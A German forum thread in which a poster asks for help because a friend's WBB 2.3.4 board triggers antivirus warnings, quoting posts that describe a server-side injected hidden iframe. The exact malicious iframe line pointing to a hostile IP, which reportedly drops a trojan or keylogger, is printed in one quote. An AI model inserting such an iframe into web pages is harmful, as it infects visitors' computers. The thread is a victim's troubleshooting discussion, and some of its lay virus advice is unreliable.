Hallo,
ein Freund von mir betreibt ein WBB 2.3.4 und seit ein paar Tagen hat insbesondere 1 User das Problem, dass sein Kaspersky rummotzt, URL bspw.:
http://208.69.230.178/logo/index.php (ist ein USA Webhoster, schätze mal gehackter Space)
Scheint momentan down zu sein, letzte Woche konnte ich noch eine http://208.69.230.178/example.txt einsehen, die u.a. Ebay-Userdaten enthielt, etc.
In einem anderen Forum haben wir das hier gefunden:
Weiss nicht, was ich davon halten soll. Eine weitere Aussage war die hier:
Könnte es das gleiche / analog zu dem Thread hier sein?
Vielen Dank im voraus für Eure Hilfe !
ein Freund von mir betreibt ein WBB 2.3.4 und seit ein paar Tagen hat insbesondere 1 User das Problem, dass sein Kaspersky rummotzt, URL bspw.:
http://208.69.230.178/logo/index.php (ist ein USA Webhoster, schätze mal gehackter Space)
Scheint momentan down zu sein, letzte Woche konnte ich noch eine http://208.69.230.178/example.txt einsehen, die u.a. Ebay-Userdaten enthielt, etc.
In einem anderen Forum haben wir das hier gefunden:
Mein Bruder hat mir gesagt das dies ein Virus ist, der sich gezielt im Browser festlegt.
Und bei manchen Seiten springt er dann an, und zeigt einen Virus an.
Angeblich soll dieser angebliche Virus der Seite, vom wirklichen Virus ablenken das dieser ohne Probleme arbeiten kann.
Empfohlen wird, den Browser geschlossen zu halten, und den Virenscanner drüberlaufen zu lassen.
Und falls er dann noch kommt, den Browser neu zu installieren.
Die Lesezeichen und Einstellungen kannst du vorher auch extra Exportieren.
Weiss nicht, was ich davon halten soll. Eine weitere Aussage war die hier:
Hallo,
ich hab mich hier ebend registriert weil ich recherchen zu dem Ärgernis h**p://81.95.149.26/logo/index.php angestellt habe.
Ich mach es mal schmerzlos : Ihr habt ( wie ich ) nen Hacker auf Eurem Server !!!!
Nachdem ich meine Startseite immer wieder nachgebessert haben , obwohl ich die Zeile
<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
immer wieder gelöscht habe. Nun ist es soweit, das diese Zeile Serverseitig eingefügt wird - nur bei PHP-Dateien - wenn ich sie in .html umbenenne , dann erscheit die o.g. Zeile nicht im Quelltext.
Ich bin nun kein Spezialist mit Serversoftware , aber bin sicher das dies Serverseitig eingefügt wird.
Auf meiner Startseite unter http://xxxxxxx schaut Euch mal die erste Zeile des Quellcodes an - dort wird das Iframe als erste Zeile mit ausgeworfen - auf dem FTP liegt die Seite jedoch clean.
Ihr habt ein ähnliches Problem und ebenfalls dieses Iframe , das zur Virenwarnung führt ebenfalls in Euren Quelltexten.
Nun such ich nach ner Lösung aber Google spuckt nicht sehr viel aus - so hab ich auch her gefunden und wollte Euch drauf hinweisen was Sache ist.
Bin nicht ganz sicher , aber unter dem Iframe lädt man sich nen Trojaner / Keylogger auf den Rechner und offensichtlich ist die Erkennung der Virenscanner nicht sehr zuverlässig.
Könnte es das gleiche / analog zu dem Thread hier sein?
Vielen Dank im voraus für Eure Hilfe !